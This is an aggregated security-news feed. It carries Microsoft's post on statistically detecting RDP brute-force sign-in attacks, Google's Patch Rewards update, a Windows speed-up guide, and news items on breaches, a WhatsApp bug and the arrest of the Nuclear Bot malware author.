“We expect that SMBs will continue to be targets for cybercriminals because, just like the public, education, and healthcare sectors, they maintain the same vulnerable environment. They’re low budget, understaffed, and often under-educated on matters of cybersecurity.”

Findings from the 451 Research report confirm Moffitt’s suspicions. A full 36 percent of SMBs surveyed in that study reported that they had no full-time staff on hand dedicated to cybersecurity. 

“The SMBs typically targeted have under 50 employees, and it often falls to a lone IT admin or someone in finance or sales to shore up cybersecurity at the company,” Moffitt says. “Almost always it’s a person who wears many hats and doesn’t have much of a budget or expertise.”

It’s the easily overlooked yet easily exploited security gaps like an unsecured RDP that most worry Moffitt. Without dedicated cybersecurity consulting, these can easily be exploited, yet they are easy to fix.

 “Expect to see more attacks against less developed nations. Attacks like this don’t generate revenue, rather they are meant to disrupt and destroy” —Grayson Milbourne, Security Intelligence Director, Webroot

We Want to Hear Your 2020 Predictions

Are these the developments you expect to see to kick off the new decade? Have some other ideas? We want to hear what hacks, news stories, or trends in cybersecurity you anticipate in the New Year. You can read additional predictions from our staff for the year ahead, plus submit your own, on the Webroot Community. Click here to visit the Community and share your 2020 predictions.

The post Cybersecurity Predictions for 2020: What Our Experts Have to Say appeared first on Webroot Blog.

Google Offers Financial Support to Open Source Projects for Cybersecurity

Besides rewarding ethical hackers from its pocket for responsibly reporting vulnerabilities in third-party open-source projects, Google today announced financial support for open source developers to help them arrange additional resources, prioritizing the security of their products. The initiative, called "Patch Rewards Program," was launched nearly 6 years ago, under which Google rewards

Data science for cybersecurity: A probabilistic time series model for detecting RDP inbound brute force attacks

Computers with Windows Remote Desktop Protocol (RDP) exposed to the internet are an attractive target for adversaries because they present a simple and effective way to gain access to a network. Brute forcing RDP, a secure network communications protocol that provides remote access over port 3389, does not require a high level of expertise or the use of exploits; attackers can utilize many off-the-shelf tools to scan the internet for potential victims and leverage similar such tools for conducting the brute force attack.

Attackers target RDP servers that use weak passwords and are without multi-factor authentication, virtual private networks (VPNs), and other security protections. Through RDP brute force, threat actor groups can gain access to target machines and conduct many follow-on activities like ransomware and coin mining operations.

In a brute force attack, adversaries attempt to sign in to an account by effectively using one or more trial-and-error methods. Many failed sign-ins occurring over very short time frequencies, typically minutes or even seconds, are usually associated with these attacks. A brute force attack might also involve adversaries attempting to access one or more accounts using valid usernames that were obtained from credential theft or using common usernames like “administrator”. The same holds for password combinations. In detecting RDP brute force attacks, we focus on the source IP address and username, as password data is not available.

In the Windows operating system, whenever an attempted sign-in fails for a local machine, Event Tracing for Windows (ETW) registers Event ID 4625 with the associated username. Meanwhile, source IP addresses connected to RDP can be accessed; this information is very useful in assessing if a machine is under brute force attack. Using this information in combination with Event ID 4624 for non-server Windows machines can shed light on which sign-in sessions were successfully created and can further help in detecting if a local machine has been compromised.

In this blog we’ll present a study and a detection logic that uses these signals. This data science-driven approach to detecting RDP brute force attacks has proven valuable in detecting human adversary activity through Microsoft Threat Experts, the managed threat hunting service in Microsoft Defender Advanced Threat Protection. This work is an example of how the close collaboration between data scientists and threat hunters results in protection for customers against real-world threats.

Insights into brute force attacks

Observing a sudden, relatively large count of Event ID 4625 associated with RDP network connections might be rare, but it does not necessarily imply that a machine is under attack. For example, a script that performs the following actions would look suspicious looking at a time series of counts of failed sign-in but is most likely not malicious:

  • uses an expired password
  • retries sign-in attempts every N-minutes with different usernames
  • over a public IP address within a range owned by the enterprise

In contrast, behavior that includes the following is indicative of an attack:

  • extreme counts of failed sign-ins from many unknown usernames
  • never previously successfully authenticated
  • from multiple RDP connections
  • from new source IP addresses

Understanding the context of failed sign-ins and inbound connections is key to discriminating between true positive (TP) and false positive (FP) brute force attacks, especially if the goal is to automatically raise only high-precision alerts to the appropriate recipients, as we do in Microsoft Defender ATP.

We analyzed several months’ worth of data to mine insights into the types of RDP brute force attacks occurring across Microsoft Defender ATP customers. Out of about 45,000 machines that had both RDP public IP connections and at least 1 network failed sign-in, we discovered that, on average, several hundred machines per day had high probability of undergoing one or more RDP brute force attack attempts. Of the subpopulation of machines with detected brute force attacks, the attacks lasted 2-3 days on average, with about 90% of cases lasting for 1 week or less, and less than 5% lasting for 2 weeks or more.

Figure 1: Empirical distribution in number of days per machine where we observed 1 or more brute force attacks

As discussed in numerous other studies [1], large counts of failed sign-ins are often associated with brute force attacks. Looking at the count of daily failed sign-ins, 90% of cases exceeded 10 attempts, with a median larger than 60. In addition, these unusual daily counts had high positive correlation with extreme counts in shorter time windows (see Figure 2). In fact, the number of extreme failed sign-ins per day typically occurred under 2 hours, with about 40% failing in under 30 minutes.

Figure 2: Count of daily and maximum hourly network failed sign-ins for a local machine under brute force attack

While a detection logic based on thresholding the count of failed sign-ins during daily or finer grain time window can detect many brute force attacks, this will likely produce too many false positives. Worse, relying on just this will yield false negatives, missing successful enterprise compromises: our analysis revealed several instances where brute force attacks generated less than 5-10 failed attempts at a daily granularity but often persisted for many days, thereby avoiding extreme counts at any point in time. For such a brute force attack, thresholding the cumulative number of failed sign-ins across time could be more useful, as depicted in Figure 3.

Figure 3: Daily and cumulative failed network sign-in

Looking at counts of network failed sign-ins provides a useful but incomplete picture of RDP brute force attacks. This can be further augmented with additional information on the failed sign-in, such as the failure reason, time of day, and day of week, as well as the username itself. An especially strong signal is the source IP of the inbound RDP connection. Knowing if the external IP has a high reputation of abuse, as can be looked up on sites like, can directly confirm if an IP is a part of an active brute force.

Unfortunately, not all IP addresses have a history of abuse; in addition, it can be expensive to retrieve information about many external IP addresses on demand. Maintaining a list of suspicious IPs is an option, but relying on this can result in false negatives as, inevitably, new IPs continually occur, particularly with the adoption of cloud computing and ease of spinning up virtual machines. A generic signal that can augment failed sign-in and user information is counting distinct RDP connections from external IP addresses. Again, extreme values occurring at a given time or cumulated over time can be an indicator of attack.

Figure 4 shows histograms (i.e., counts put into discrete bins) of daily counts of RDP public connections per machine that occurred for an example enterprise with known brute force attacks. It’s evident that normal machines have a lower probability of larger counts compared to machines attacked.

Figure 4: Histograms of daily count of RDP inbound across machines for an example enterprise

Given that some enterprises have machines under brute force attack daily, the priority may be to focus on machines that have been compromised, defined by a first successful sign-in following failed attempts from suspicious source IP addresses or unusual usernames. In Windows logs, Event ID 4624 can be leveraged to measure successful sign-in events for local machine in combination with failed sign-ins (Event ID 4625).

Out of the hundreds of machines with RDP brute force attacks detected in our analysis, we found that about .08% were compromised. Furthermore, across all enterprises analyzed over several months, on average about 1 machine was detected with high probability of being compromised resulting from an RDP brute force attack every 3-4 days. Figure 5 shows a bubble chart of the average abuse score of external IPs associated with RDP brute force attacks that successfully compromised machines. The size of the bubbles is determined by the count of distinct machines across the enterprises analyzed having a network connection from each IP. While there is diversity in the origin of the source IPs, Netherlands, Russia, and the United Kingdom have a larger concentration of inbound RDP connections from high-abuse IP.

Figure 5: Bubble chart of IP abuse score versus counts of machine with inbound RDP

A key takeaway from our analysis is that successful brute force attempts are not uncommon; therefore, it’s critical to monitor at least the suspicious connections and unusual failed sign-ins that result in authenticated sign-in events. In the following sections we describe a methodology to do this. This methodology was leveraged by Microsoft Threat Experts to augment threat hunting and resulted in new targeted attack notifications.

Combining many relevant signals

As discussed earlier (with the example of scripts connecting via RDP using outdated passwords yielding failed sign-ins), simply relying on thresholding failed attempts per machine for detecting brute force attacks can be noisy and may result in many false positives. A better strategy is to utilize many contextually relevant signals, such as:

  • the timing, type, and count of failed sign-in
  • username history
  • type and frequency of network connections
  • first-time username from a new source machine with a successful sign-in

This can be even further extended to include indicators of attack associated with brute force, such as port scanning.

Combining multiple signals along the attack chain has been proposed and shown promising results [2]. We considered the following signals in detecting RDP inbound brute force attacks per machine:

  • hour of day and day of week of failed sign-in and RDP connections
  • timing of successful sign-in following failed attempts
  • Event ID 4625 login type (filtered to network and remote interactive)
  • Event ID 4625 failure reason (filtered to %%2308, %%2312, %%2313)
  • cumulative count of distinct username that failed to sign in without success
  • count (and cumulative count) of failed sign-ins
  • count (and cumulative count) of RDP inbound external IP
  • count of other machines having RDP inbound connections from one or more of the same IP

Unsupervised probabilistic time series anomaly detection

For many cybersecurity problems, including detecting brute force attacks, previously labeled data is not usually available. Thus, training a supervised learning model is not feasible. This is where unsupervised learning is helpful, enabling one to discover and quantify unknown behaviors when examples are too sparse. Given that several of the signals we consider for modeling RDP brute force attacks are inherently dependent on values observed over time (for example, daily counts of failed sign-ins and counts of inbound connections), time series models are particularly beneficial. Specifically, time series anomaly detection naturally provides a logical framework to quantify uncertainty in modeling temporal changes in data and produce probabilities that then can be ranked and thresholded to control a desirable false positive rate.

Time series anomaly detection captures the temporal dynamics of signals and accurately quantifies the probability of observing values at any point in time under normal operating conditions. More formally, if we introduce the notation Y(t) to denote the signals taking on values at time t, then we build a model to compute reliable estimates of the probability of Y(t) exceeding observed values given all known and relevant information, represented by P[y(t)], sometimes called an anomaly score. Given a false positive tolerance rate r (e.g., .1% or 1 out of 10,000 per time), for each time t, values y*(t) satisfying P[y*(t)] < r would be detected as anomalous. Assuming the right signals reflecting the relevant behaviors of the type of attacks are chosen, then the idea is simple: the lowest anomaly scores occurring per time will be likely associated with the highest likelihood of real threats.

For example, looking back at Figure 2, the time series of daily count of failed sign-ins occurring on the brute force attack day 8/4/2019 had extreme values that would be associated with an empirical probability of about .03% out of all machine and days with at least 1 failed network sign-in for the enterprise.

As discussed earlier, applying anomaly detection to 1 or a few signals to detect real attacks can yield too many false positives. To mitigate this, we combined anomaly scores across eight signals we selected to model RDP brute force attack patterns. The details of our solution are included in the Appendix, but in summary, our methodology involves:

  • updating statistical discrete time series models sequentially for each signal, capturing time of day, day of week, and both point and cumulative effects
  • combining anomaly scores using an approach that yields accurate probability estimates, and
  • ranking the top N anomalies per day to control a desired number of false positives

Our approach to time series anomaly detection is computationally efficient, automatically learns how to update probabilities and adapt to changes in data.

As we describe in the next section, this approach has yielded successful attack detection at high precision.

Protecting customers from real-word RDP brute force attacks through Microsoft Threat Experts

The proposed time series anomaly detection model was deployed and utilized by Microsoft Threat Experts to detect RDP brute force attacks during threat hunting activities. A list that ranks machines across enterprises with the lowest anomaly scores (indicating the likelihood of observing a value at least as large under expected conditions in all signals considered) is updated and reviewed every day. See Table 1 for an example.

Table 1: Sample ranking of detected RDP inbound brute force attacks

For each machine with detection of a probable brute force attack, each instance is assigned TP, FP, or unknown. Each TP is then assigned priority based on the severity of the attack. For high-priority TP, a targeted attack notification is sent to the associated organization with details about the active brute force attack and recommendations for mitigating the threat; otherwise the machine is closely monitored until more information is available.

We also added an extra capability to our anomaly detection: automatically sending targeted attack notifications about RDP brute force attacks, in many cases before the attack succeeds or before the actor is able to conduct further malicious activities. Looking at the most recent sample of about two weeks of graded detections, the average precision per day (i.e., true positive rate) is approximately 93.7% at a conservative false positive rate of 1%.

In conclusion, based on our careful selection of signals found to be highly associated with RDP brute force attacks, we demonstrated that proper application of time series anomaly detection can be very accurate in identifying real threats. We have filed a patent application for this probabilistic time series model for detecting RDP inbound brute force attacks. In addition, we are working on integrating this capability into Microsoft Defender ATP’s endpoint and detection response capabilities so that the detection logic can raise alerts on RDP brute force attacks in real-time.

Monitoring suspicious activity in failed sign-ins and network connections should be taken seriously—a real-time anomaly detection capable of self-updating with the changing dynamics in a network can indeed provide a sustainable solution. While Microsoft Defender ATP already has many anomaly detection capabilities integrated into its EDR capabilities, which enrich advanced threat protection across the broader Microsoft Threat Protection, we will continue to enhance these detections to cover more security scenarios. Using data science, we will continue to combine robust statistical and machine learning approaches with threat expertise and intelligence to deliver industry-leading protection to our customers through Microsoft Threat Protection.



Cole Sodja, Justin Carroll, Joshua Neil
Microsoft Defender ATP Research Team



Appendix 1: Models formulation

We utilize hierarchical zero-adjusted negative binomial dynamic models to capture the characteristics of the highly discrete count time series. Specifically, as shown in Figure 2, it’s expected that most of the time there won’t be failed sign-ins for valid credentials on a local machine; hence, there are excess zeros that would not be explained by standard probability distributions such as the negative binomial. In addition, the variance of non-zero counts is often much larger than the mean, where for example, valid scripts connecting via RDP can generate counts in the 20s or more over several minutes because of an outdated password. Moreover, given a combination of multiple users or scripts connecting to shared machines at the same time, this can generate more extreme counts at higher quantiles resulting in heavier tails, as seen in Figure 6.

Figure 6: Daily count of network failed sign-in for a machine with no brute force attack

Parametric discrete location/scale distributions do not generate well-calibrated p-values for rare time series, as seen in Figure 6, and thus if used to detect anomalies can result in too many FPs when looking across many machines at high time frequencies. To overcome this challenge dealing with the sparse time series of counts of failed sign-in and RDP inbound public connections we specify a mixture model, where, based on our analysis, a zero-inflated two-component negative binomial distribution was adequate.

Our formulation is based on thresholding values that determine when to transition to a distribution with larger location and/or scale as given in Equation 1. Hierarchical priors are given from empirical estimates of the sample moments across machines using about 1 month of data.

Equation 1: Zero-adjusted negative binomial threshold model

Negative binomial distribution (NB):

To our knowledge, this formulation does not yield a conjugate prior, and so directly computing probabilities from the posterior predicted density is not feasible. Instead, anomaly scores are generated based on drawing samples from all distributions and then computing the empirical right-tail p-value.

Updating parameters is done based on applying exponential smoothing. To avoid outliers skewing estimates, such as machines under brute force or other attacks, trimming is applied to sample from the distribution at a specified false positive rate, which was set to .1% for our study. Algorithm 1 outlines the logic.

The smoothing parameters were learned based on maximum likelihood estimation and then fixed during each new sequential update. To induce further uncertainty, bootstrapping across machines is done to produce a histogram of smoothing weights, and samples are drawn in accordance to their frequency. We found that weights concentrated away from 0 vary between .06% and 8% for over 90% of machines, thus leading to slow changes in the parameters. An extension using adaptive forgetting factors will be considered in future work to automatically learn how to correct smoothing in real time.

Algorithm 2: Updating model parameters real-time

Appendix 2: Fisher Combination

For a given device, for each signal that exists a score is computed defined as a p-value, where lower values are associated with higher likelihood of being an anomaly. Then the p-values are combined to yield a joint score across all signals based on using the Fisher p-value combination method as follows:

The use of Fisher’s test applied to anomaly scores produces a scalable solution that yields interpretable probabilities that thus can be controlled to achieve a desired false positive rate. This has even been applied in a cybersecurity context. [3]



[1] Najafabadi et al, Machine Learning for Detecting Brute Force Attacks at the Network Level, 2014 IEEE 14th International Conference on Bioinformatics and Bioengineering
[2] Sexton et al, Attack chain detection, Statistical Analysis and Data Mining, 2015
[3] Heard, Combining Weak Statistical Evidence in Cyber Security, Intelligent Data Analysis XIV, 2015




Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Read all Microsoft security intelligence blog posts.

Follow us on Twitter @MsftSecIntel.

The post Data science for cybersecurity: A probabilistic time series model for detecting RDP inbound brute force attacks appeared first on Microsoft Security.

Data governance and retention in your Microsoft 365 tenant—a secure and highly capable solution

Data governance has relied on transferring data to a third-party for hosting an archive service. Emails, documents, chat logs, and third-party data (Bloomberg, Facebook, LinkedIn, etc.) must be saved in a way that it can’t be changed and won’t be lost. Data governance is part of IT at the enterprise level. It serves regulatory compliance, can facilitate eDiscovery, and is part of a business strategy to protect the integrity of the data estate.

However, there are downsides.

In addition to acquisition costs, the archive is one more system that needs ongoing maintenance. When data is moved to another system, the risk footprint is increased, and data can be compromised in transit. An at-rest archive can become another target of attack.

When you take the data to the archive, you miss the opportunity to reason over it with machine learning to extract additional business value and insights to improve the governance program.

The game changer is to have reliable, auditable retention inside the Microsoft 365 tenant. This way, all the security controls and visibility in Microsoft 365 and Azure remain in effect. There is no additional archive to be attacked, protected, or monitored. In addition, there is no third-party archiving system to be purchased or maintained.

All the machine learning and correlation tools—always on and native to Microsoft 365—are reasoning over your data estate. Dark data can be illuminated.

Microsoft 365 tenant dashboards

Microsoft 365 dashboards are created automatically. Tiles allow you to drill down to the file level and locate sensitive data. Retention, disposition review, and deletion policies can be visualized, and compliance verified. Audit-ready governance reports can be generated.

Screenshot of label analytics in the Microsoft 365 compliance tenant dashboard.

Your data governance program becomes measurable, manageable, and useable. It adds value to your business rather than being just a compliance tool.

Data governance is more than retention for Microsoft 365. Businesses rely on non-Microsoft solutions as well. There are built-in connectors for Bloomberg, Facebook, LinkedIn, and other popular third-party applications that allow this data to be brought into Microsoft 365 for retention.

Screenshot of a connector being added in the Office 365 Security & Compliance dashboard.

Where we don’t yet have a connector for your solution, Microsoft Partners can provide a wide range of pre-built connectors or the ability to build custom connectors using our software development toolkit. To learn more, read Work with a partner to archive third-party data in Office 365.

In some cases, particularly where regulatory compliance—such as with the CFTC Rule 1.31(c)-(d), FINRA Rule 4511, and SEC Rule 17a-4—is needed, immutability of records must be maintained. These rules have specific requirements for electronic data storage, including many aspects of records management, such as the duration, format, quality, availability, and accountability of records retention. Microsoft provides the admin this ability in the Label settings. To do this, under Classify content as a “Record” with this label, select the Yes, classify as a regulatory “Record” dropdown option, and then under Retain this content, set the duration.

Screenshot of a label setting in the Office 365 Security & Compliance dashboard.

Once set, this option cannot be changed. Even admins are not able to change or delete the records.

Microsoft engaged Cohasset Associates to review this capability and provide an assessment document for consideration of our customers and their regulators. The assessment is available at: Data Protection Resources. Currently the assessment includes Exchange Online and will be extended to include SharePoint Online in mid-2020.

The ability to archive data inside the Microsoft 365 tenant with security controls intact and all the visibility and machine learning features of Microsoft 365 available is an advantage that many organizations can use, some with their existing licenses.

Learn more

To find out more about other advanced compliance features, check out Microsoft 365 compliance documentation. Also, bookmark the Security blog to keep up with our expert coverage on security matters and follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Data governance and retention in your Microsoft 365 tenant—a secure and highly capable solution appeared first on Microsoft Security.

Announcing updates to our Patch Rewards program in 2020

At Google, we strive to make the internet safer and that includes recognizing and rewarding security improvements that are vital to the health of the entire web. In 2020, we are building on this commitment by launching a new iteration of our Patch Rewards program for third-party open source projects.

Over the last six years, we have rewarded open source projects for security improvements after they have been implemented. While this has led to overall improved security, we want to take this one step further.

Introducing upfront financial help
Starting on January 1, 2020, we’re not only going to reward proactive security improvements after the work is completed, but we will also complement the program with upfront financial support to provide an additional resource for open source developers to prioritize security work. For example, if you are a small open source project and you want to improve security, but don’t have the necessary resources, this new reward can help you acquire additional development capacity.

We will start off with two support levels :
  • Small ($5,000): Meant to motivate and reward a project for fixing a small number of security issues. Examples: improvements to privilege separation or sandboxing, cleanup of integer artimetrics, or more generally fixing vulnerabilities identified in open source software by bug bounty programs such as EU-FOSSA 2 (see ‘Qualifying submissions’ here for more examples).
  • Large ($30,000): Meant to incentivize a larger project to invest heavily in security, e.g. providing support to find additional developers, or implement a significant new security feature (e.g. new compiler mitigations).
Nomination process

Anyone can nominate an open source project for support by filling out Our Patch Reward Panel will review submissions on a monthly basis and select a number of projects that meet the program criteria. The panel will let submitors know if a project has been chosen and will start working with the project maintainers directly.

Projects in scope

Any open source project can be nominated for support. When selecting projects, the panel will put an emphasis on projects that either are vital to the health of the Internet or are end-user projects with a large user base.

What do we expect in return?

We expect to see security improvements to open source software. Ideally, the project can provide us
with a short blurb or pointers to some of the completed work that was possible because of our support. We don’t want to add bureaucracy, but would like to measure the success of the program.
What about the existing Patch Rewards program?
This is an addition to the existing program, the current Patch Rewards program will continue as it stands today.

Increasing Industry Participation and Knowledge

Increasing industry participation and knowledge is a core pillar in the PCI Security Standards Council’s strategic framework, which guides how the Council achieves its mission and supports the needs of the global payments industry. To round out our Q&A blog series introducing the framework, we interview PCI SSC Executive Director Lance Johnson on this foundational strategic pillar and how it ties the framework together.

LifeLabs Paid Hackers to Recover Stolen Medical Data of 15 Million Canadians

LifeLabs, the largest provider of healthcare laboratory testing services in Canada, has suffered a massive data breach that exposed the personal and medical information of nearly 15 million Canadians customers. The company announced the breach in a press release posted on its website, revealing that an unknown attacker unauthorizedly accessed its computer systems last month and stole customers

How to Speed Up a Slow PC Running Windows OS

Working with a slow PC is always annoying and frustrating. Enduring sudden frozen windows and stuttered animations can make you want to throw the machine out the window.

Take a deep breath, and consider these 8 tips on how to fix a slow PC running Windows.



Why is my Windows Running Slow?

First, here is a general analysis on why your Windows PC is running slow:

  • Your computer is running out of memory (RAM)
  • Your PC mode settings
  • There are too many startup items and background programs
  • Useless features or animation
  • Insufficient disk space
  • Too cluttered registry
  • Malware and Virus Infection
  • Unneeded third-party software

1. Restart your Computer

Many users are accustomed to keeping their computers running for several weeks. Their PC is either running or sleeping with the processes saved all the time. This means the running programs are occupying and filling up their RAM continuously, which can lead to the PC running extremely slowly. In addition, the computer might suffer from some bugs, which trigger programs to eat up much more RAM than they should. To avoid these troubles, restart your PC by clicking on the Windows button, selecting the ‘Power’ button, and choosing the ‘Restart’ button at least once a week.

A small hint: make sure you have saved your ongoing work before you shut down your computer.

2. Adjust setting modes

This is a very simple but often overlooked way to boost your PC’s performance. However, it sacrifices a bit of standby time. When you are not worrying about the state of charge and just pursuing maximum efficiency, you can consider opening Advanced System Setting in Windows for this trick.

Enter “Control Panel” in the Cortana search box in the taskbar. In the pop-up window, click “System,” and then click “Advanced system settings” in the left window, as shown below:

Click “Settings” in the performance bar, as shown in the following figure:

In the pop-up window, you can see that there are four setting modes, set “Adjust for best performance,” and then click OK, as shown in the following figure:

3. Disable Startup Programs

Startup items are programs that the system will run in the foreground or background once your computer is ON. When you download and install software, the “start-up” is usually a default choice. Therefore, if the software is not commonly used and you do not need to use it every time you start your PC, you can remove the check because it can slow down system speed. If you forgot to remove the check when installing the application, you can also make changes using the Task Manager.

To check and manage your startup programs, open the Task Manager (Ctrl + Alt + Del), then switch to the ‘Startup’ tab. You’ll also see the “Startup impact” of each startup program — either Low, Medium, or High. If you see “Not measured,” that’s because it was recently added and Windows hasn’t had a chance to observe the program’s behavior yet.

To prevent a program from launching on startup just right-click and choose “Disable.”

If you are not sure whether you can safely disable some programs, you can search the program online and learn about its function. If you are a little worried, you can download a PC cleaner app, which can automatically identify and classify these items and help you delete the unnecessary ones in batches. Remember to choose those apps without pop-up advertisements and hidden fees.

In addition, you can see the first tab named “Processes” in the picture above. Too many programs running simultaneously can slow down the system speed as well. Some programs may continue running in the background even after you have closed them. Under the “Processes” tab, you can select them and click ‘End task’ at the bottom right. However, be careful about this action because you might close some important processes needed to run Windows.

4. Turn off windows tips and tricks

When searching ways to speed up your PC online, your PC will ask you to disable the “Visual Effects” feature as they use up your PC’s performance. However, this operation needs you to balance the operating speed and the appearance of your PC, and even adjust those settings many times to achieve satisfying visual effects. Instead, here is an item that you can change without a hitch.

When you use a windows PC, Windows will always pay attention to what you are doing and provide tips on what you may want to do with your computer. You may find these tips unhelpful and even feel offended by its constant virtual viewing over your shoulders.

If you want to speed up your PC, you can ask Windows to stop giving you advice. To do this, click the START button, select the Settings icon, and then go to Systems > Notification & actions. Scroll down to the notifications section and uncheck the box labeled “Get tips, tricks, and suggestions as you use Windows.”

5. Run Disk Cleanup

Do not let that “Disk space is almost full” message pop up and stop your work. Too many junk files, useless big files and duplicate files usually cause insufficient disk space. To save gigabytes of disk space for things you really need, you should clean them regularly to free up space.

Here are steps on how to use the built-in Windows utility to run disk cleanup:

Press “WINDOWS + R” and enter the cleanmgr command with parameters:

cleanmgr /sageset

In the Disk Cleanup Settings window, you can find items you can clean.

Note that this operation is only the setting operation of the checked item. It has not been actually cleaned. After clicking OK, you need to press “WINDOWS + R” and enter “cleanmgr /sagerun:99”, and then it can execute specific cleanup operations.

You can also turn ON the storage sense function to remove unnecessary files automatically.

Enter Settings > System > Storage, and then turn ON the Storage sense function to allow Windows to clean up temporary files automatically. It can be set to run automatically every day, every fortnight, every month, or every two months.

Definitely, some cleanup apps can help you do the work more quickly and accurately. Besides useless files, they can even retrieve and delete similar photos. You can evaluate and download them according to your own needs.

6. Clean out your Registry

Registry is an important database, which is used to store the setting information of system and application program running in Windows. As early as Windows 3.0 introduced OLE technology, the registry has appeared. Windows NT was the first operating system to make extensive use of the registry at the system level. However, since the beginning of the Microsoft Windows 95 operating system, the registry has been a critical database that will continue to play a role in the subsequent operating systems.

The command to open the registry is:

Regedit or regedit.exe, regedt32 or regedt32.exe

Under normal circumstances, you can click the operation in the START menu (WINDOWS + R), and then enter regedit or regedit.exe and click OK to open the registry editor of Windows operating system.

The registry is a very messy thing. For example, when a program is uninstalled, the program’s settings are not always cleared in the registry. So over time, it will be filled with various outdated settings. This may lead to poor performance of your PC system.

A word of caution: Editing the registry manually is risky. A mistake can lead to system-level interruptions. Therefore, to clean the registry, it is recommended that a professional registry cleaner is used.

7. Malware and Virus Infection

As we all know, malware and viruses will infect the computer and make it run more sluggishly. There are a large number of antivirus apps in the marketplace. Trend Micro offers several options to consider.

8. Disable third-party services  

If you installed a lot of software on your PC, the system may become chaotic and some unexpected problems might occur. For example, several security applications are running at the same time can create conflicts that make the system misbehave. You can disable all third-party software services and only keep the system itself. The system status will also be called “Clean Boot.”

Here is how to perform a clean boot of Windows:

Press “WINDOWS + R” and type “msconfig”, then click OK. Open System Configuration, go to the Services tab and put a tick in the “Hide all Microsoft services” box at the bottom left before choosing the items and hitting Disable all.

We hope the listed solutions can help you boost your PC performance conveniently. Manually checking what is wrong with your Windows can be time-consuming and painstaking. When those irritating system messages pop up and interfere with your work, it is time to turn to a trusted all-in-one system care utility like Cleaner One. By employing this productive worker, you can retrieve and delete unnecessary items, have less clutter, make your computer more efficient, and optimize your Windows OS with just a few clicks. Why not give it a go?

The post How to Speed Up a Slow PC Running Windows OS appeared first on .

Profile of a Hacker Guild

It’s no surprise there is a massive cybersecurity skills gap that has left technical teams searching for any experienced talent they can find. Unfortunately, many curious minds trying to break into the field are often surprised by the shortage of training programs and junior level opportunities that could help close the skills gap in the long term. For example, a recent survey identified that 81% of ethical hackers are self-taught - a staggering number that shows the relative lack of formal educational opportunities available to future talent. 

14 Ways to Evade Botnet Malware Attacks On Your Computers

Cybercriminals are busy innovators, adapting their weapons and attack strategies, and ruthlessly roaming the web in search of their next big score. Every manner of sensitive information, such as confidential employee records, customers' financial data, protected medical documents, and government files, are all subject to their relentless threats to cybersecurity. Solutions span a broad

Norsk Hydro responds to ransomware attack with transparency

Last March, aluminum supplier Norsk Hydro was attacked by LockerGoga, a form of ransomware. The attack began with an infected email and locked the files on thousands of servers and PCs. All 35,000 Norsk Hydro employees across 40 countries were affected. In the throes of this crisis, executives made three swift decisions:

  • Pay no ransom.
  • Summon Microsoft’s cybersecurity team to help restore operations.
  • Communicate openly about the breach.

Read Hackers hit Norsk Hydro with ransomware to learn why this approach helped the company recover and get back to business as usual.

The post Norsk Hydro responds to ransomware attack with transparency appeared first on Microsoft Security.

This Bug Could Have Let Anyone Crash WhatsApp Of All Group Members

WhatsApp, the world's most popular end-to-end encrypted messaging application, patched an incredibly frustrating software bug that could have allowed a malicious group member to crash the messaging app for all members of the same group, The Hacker News learned. Just by sending a maliciously crafted message to a targeted group, an attacker can trigger a fully-destructive WhatsApp crash-loop,

Nuclear Bot Author Arrested in Sextortion Case

Last summer, a wave of sextortion emails began flooding inboxes around the world. The spammers behind this scheme claimed they’d hacked your computer and recorded videos of you watching porn, and promised to release the embarrassing footage to all your contacts unless a bitcoin demand was paid. Now, French authorities say they’ve charged two men they believe are responsible for masterminding this scam. One of them is a 21-year-old hacker interviewed by KrebsOnSecurity in 2017 who openly admitted to authoring a banking trojan called “Nuclear Bot.”

On Dec. 15, the French news daily Le Parisien published a report stating that French authorities had arrested and charged two men in the sextortion scheme. The story doesn’t name either individual, but rather refers to one of the accused only by the pseudonym “Antoine I.,” noting that his first had been changed (presumably to protect his identity because he hasn’t yet been convicted of a crime).

“According to sources close to the investigation, Antoine I. surrendered to the French authorities at the beginning of the month, after being hunted down all over Europe,” the story notes. “The young Frenchman, who lived between Ukraine, Poland and the Baltic countries, was indicted on 6 December for ‘extortion by organized gang, fraudulent access to a data processing system and money laundering.’ He was placed in pre-trial detention.”

According to Le Parisien, Antoine I. admitted to being the inventor of the initial 2018 sextortion scam, which was subsequently imitated by countless other ne’er-do-wells. The story says the two men deployed malware to compromise at least 2,000 computers that were used to blast out the sextortion emails.

While that story is light on details about the identities of the accused, an earlier version of it published Dec. 14 includes more helpful clues. The Dec. 14 piece said Antoine I. had been interviewed by KrebsOnSecurity in April 2017, where he boasted about having created Nuclear Bot, a malware strain designed to steal banking credentials from victims.

My April 2017 exposé featured an interview with Augustin Inzirillo, a young man who came across as deeply conflicted about his chosen career path. That path became traceable after he released the computer code for Nuclear Bot on GitHub. Inzirillo outed himself by defending the sophistication of his malware after it was ridiculed by both security researchers and denizens of the cybercrime underground, where copies of the code wound up for sale. From that story:

“It was a big mistake, because now I know people will reuse my code to steal money from other people,” Inzirillo told KrebsOnSecurity in an online chat.

Inzirillo released the code on GitHub with a short note explaining his motivations, and included a contact email address at a domain ( set up long ago by his father, Daniel Inzirillo.

KrebsOnSecurity also reached out to Daniel, and heard back from him roughly an hour before Augustin replied to requests for an interview. Inzirillo the elder said his son used the family domain name in his source code release as part of a misguided attempt to impress him.

“He didn’t do it for money,” said Daniel Inzirillo, whose CV shows he has built an impressive career in computer programming and working for various financial institutions. “He did it to spite all the cyber shitheads. The idea was that they wouldn’t be able to sell his software anymore because it was now free for grabs.”

If Augustin Inzirillo ever did truly desire to change his ways, it wasn’t clear from his apparent actions last summer: The Le Parisien story says the sextortion scams netted the Frenchman and his co-conspirator at least a million Euros.

In August 2018, KrebsOnSecurity was contacted by a researcher working with French authorities on the investigation who said he suspected the young man was bragging on Twitter that he used a custom version of Nuclear Bot dubbed “TinyNuke” to steal funds from customers of French and Polish banks.

The source said this individual used the now-defunct Twitter account @tiny_gang1 to taunt French authorities, while showing off a fan of 100-Euro notes allegedly gained from his illicit activities (see image above). It seemed to the source that Inzirillo wanted to get caught, because at one point @tiny_gang1 even privately shared a copy of Inzirillo’s French passport to prove his identity and accomplishments to the researcher.

“He modified the Tinynuke’s config several times, and we saw numerous modifications in the malware code too,” the source said. “We tried to compare his samples with the leaked code available on GitHub and we noticed that the guy actually was using a more advanced version with features that don’t exist in the publicly available repositories. As an example, custom samples have video recording functionality, socks proxy and other features. So the guy clearly improved the source code and recompiled a new version for every new campaign.”

